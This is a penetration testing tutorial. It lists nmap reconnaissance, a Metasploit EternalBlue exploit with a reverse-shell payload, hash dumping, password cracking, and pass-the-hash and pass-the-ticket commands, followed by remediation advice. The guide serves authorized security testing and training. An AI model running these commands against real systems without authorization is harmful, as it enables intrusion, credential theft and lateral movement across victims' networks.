Network Penetration Testing

Overview

Testing Scope

1. Information Gathering

• Network Topology
• Host Discovery
• Port Scanning
• Service Identification

2. Vulnerability Scanning

• System Vulnerabilities
• Service Vulnerabilities
• Configuration Errors
• Weak Passwords

3. Vulnerability Exploitation

• Remote Code Execution
• Privilege Escalation
• Lateral Movement
• Persistence

Information Gathering

Network Scanning

# 主机发现
nmap -sn 192.168.1.0/24

# 端口扫描
nmap -sS -p- 192.168.1.100

# 服务识别
nmap -sV -sC 192.168.1.100

# 操作系统识别
nmap -O 192.168.1.100

# 完整扫描
nmap -sS -sV -sC -O -p- 192.168.1.100

# 快速端口扫描
masscan -p1-65535 192.168.1.0/24 --rate=1000

Service Enumeration

# 枚举SMB共享
smbclient -L //192.168.1.100 -N

# 枚举SMB用户
enum4linux -U 192.168.1.100

# 使用nmap脚本
nmap --script smb-enum-shares,smb-enum-users 192.168.1.100

# 枚举RPC服务
rpcclient -U "" -N 192.168.1.100

# 使用nmap脚本
nmap --script rpc-enum 192.168.1.100

# SNMP扫描
snmpwalk -v2c -c public 192.168.1.100

# 使用onesixtyone
onesixtyone -c wordlist.txt 192.168.1.0/24

Vulnerability Scanning

Using Nessus

# 启动Nessus
# 访问Web界面
# 创建扫描任务
# 分析扫描结果

Using OpenVAS

# 启动OpenVAS
gvm-setup

# 访问Web界面
# 创建扫描任务
# 分析扫描结果

Using Nmap Scripts

# 漏洞扫描
nmap --script vuln 192.168.1.100

# 特定漏洞扫描
nmap --script smb-vuln-ms17-010 192.168.1.100

# 所有脚本
nmap --script all 192.168.1.100

Vulnerability Exploitation

Metasploit

# 启动Metasploit
msfconsole

# 搜索漏洞
search ms17-010

# 使用模块
use exploit/windows/smb/ms17_010_eternalblue

# 设置参数
set RHOSTS 192.168.1.100
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.10
set LPORT 4444

# 执行
exploit

# 获取系统信息
sysinfo

# 获取权限
getsystem

# 迁移进程
migrate <pid>

# 获取哈希
hashdump

# 获取密码
run post/windows/gather/smart_hashdump

Common Vulnerability Exploits

# 使用Metasploit
use exploit/windows/smb/ms17_010_eternalblue

# 使用独立工具
python eternalblue.py 192.168.1.100

# 使用Metasploit
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

# 使用独立工具
python smbghost.py 192.168.1.100

Lateral Movement

Password Cracking

# 破解NTLM哈希
hashcat -m 1000 hashes.txt wordlist.txt

# 破解LM哈希
hashcat -m 3000 hashes.txt wordlist.txt

# 使用规则
hashcat -m 1000 hashes.txt wordlist.txt -r rules/best64.rule

# 破解哈希
john hashes.txt

# 使用字典
john --wordlist=wordlist.txt hashes.txt

# 使用规则
john --wordlist=wordlist.txt --rules hashes.txt

Pass-the-Hash

# SMB Pass-the-Hash
python smbexec.py -hashes :<hash> domain/user@target

# WMI Pass-the-Hash
python wmiexec.py -hashes :<hash> domain/user@target

# RDP Pass-the-Hash
xfreerdp /u:user /pth:<hash> /v:target

Pass-the-Ticket

# 提取票据
sekurlsa::tickets /export

# 注入票据
kerberos::ptt ticket.kirbi

# 请求票据
Rubeus.exe asktgt /user:user /domain:domain /rc4:hash

# 注入票据
Rubeus.exe ptt /ticket:ticket.kirbi

Tool Usage

Nmap

# 完整扫描
nmap -sS -sV -sC -O -p- -T4 target

# 隐蔽扫描
nmap -sS -T2 -f -D RND:10 target

# UDP扫描
nmap -sU -p- target

Metasploit

# 启动框架
msfconsole

# 数据库初始化
msfdb init

# 导入扫描结果
db_import nmap.xml

# 查看主机
hosts

# 查看服务
services

Burp Suite

1. Configure proxy
2. Browse target network
3. Analyze traffic
4. Active scanning

Testing Checklist

Information Gathering

• Network Topology Discovery
• Host Discovery
• Port Scanning
• Service Identification
• Operating System Identification

Vulnerability Scanning

• System Vulnerability Scanning
• Service Vulnerability Scanning
• Configuration Error Check
• Weak Password Check

Vulnerability Exploitation

• Remote Code Execution
• Privilege Escalation
• Lateral Movement
• Persistence

Common Security Issues

1. Unpatched Systems

• Systems not updated in a timely manner
• Known vulnerabilities exist
• Poor patch management

• Install patches promptly
• Establish patch management processes
• Perform regular security updates

2. Weak Passwords

• Default passwords
• Simple passwords
• Password reuse

• Implement strong password policies
• Enable multi-factor authentication
• Change passwords regularly

3. Open Ports

• Unnecessary ports open
• Services exposed
• Incorrect firewall configurations

• Close unnecessary ports
• Implement firewall rules
• Use VPN for access

4. Configuration Errors

• Default configurations
• Excessive privileges
• Improper service configurations

• Security configuration baselines
• Principle of least privilege
• Regular configuration reviews

Best Practices

1. Information Gathering

• Comprehensive scanning
• Multi-tool verification
• Document findings
• Analyze results

2. Vulnerability Exploitation

• Authorized testing only
• Minimal impact
• Document operations
• Timely cleanup

3. Report Writing

• Detailed documentation
• Risk rating
• Remediation recommendations
• Verification steps

Notes

• Only perform testing in authorized environments
• Avoid impacting production systems
• Comply with laws and regulations
• Protect test data